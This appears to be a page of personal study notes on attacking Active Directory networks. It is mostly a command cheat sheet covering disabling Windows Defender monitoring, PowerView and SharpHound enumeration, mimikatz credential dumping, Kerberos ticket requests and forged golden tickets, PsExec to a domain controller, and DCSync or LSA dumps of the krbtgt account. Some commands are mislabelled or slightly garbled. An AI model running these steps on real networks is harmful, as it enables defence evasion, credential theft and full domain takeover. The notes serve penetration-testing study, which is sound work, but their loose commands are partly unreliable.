Skip to the content.

Active Directory Exploitation


Back to Table of Contents

Overview


AD: General Pathways

A few of the many exploitation pathways:

Methods:


AD: Enumeration and Assessment

After gaining access to a machine within an AD network, it is essential to enumerate the environment and understand the network, the domain, the machines within it, and where the compromised machine stands in relation to the environment (permissions, groups, routes to admin, etc.).

Enumeration of AD can be done in various ways and many tools exist. Among them, some of the most popular and useful include sharphound/bloodhound, powerview, impacket, and of course, powershell.


Useful Resources:

https://wadcoms.github.io/

https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-powerview

https://book.hacktricks.xyz/windows-hardening/active-directory-methodology


Tools


Powerview

Disable Monitoring

Set-MpPreference -DisableRealtimeMonitoring $true

Get Domain Info

Get-Domain
Get-DomainController
Get-Domain -Domain domain.local
Get-DomainController -Domain domain.local
Get-DomainUser
Get-DomainSID
Get-DomainPolicy
(Get-DomainPolicy)."SystemAccess"
Invoke-ShareFinder
Invoke-MapDomainTrust

Using Bloodhound

File transfer --> download sharphound --> exfiltrate the data --> view data in bloodhound --> identify valuable accounts or pathways within the domain --> use relevant tools to try to exploit those accounts and move laterally

.\sharphound.exe -c Default, GPOLocalGroup, LoggedOn --zipfilename output

Use mimikatz to find vulnerable accounts with weak passwords to be used for further exploitation:

privilege::debug

sekurlsa::logonPasswords

Pass the Ticket Example

Identify service principals:

Request ticket for vulnerable SPN (this can be done with mimikatz or via powershell):

powershell method:

Add-Type –AssemblyName System.IdentityModel

New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken –ArgumentList ‘SPN'

mimikatz method: After getting an SPN with domain controller access or access for lateral movement: (example - SPN is mssqlserver)

kerberos::purge
kerberos::list
kerberos::ask /target:mssqlserver
kerberos::list /export

kerberos::golden /user:admin /domain:corp.com /sid:S-1-5-21-xxx-xxxx-xxxxx /target:domain.com /service:MSSQLServer /rc4:hash /ptt


Accessing the DC with Admin privileges:

PsExec64.exe \\domain-dc01\ cmd.exe 
pushd \\domain-dc01\c$
cd \\domain-dc01\c$
lsaDump::dcsync /user:krbtgt

clsadump::lsa /inject /name:krbtgt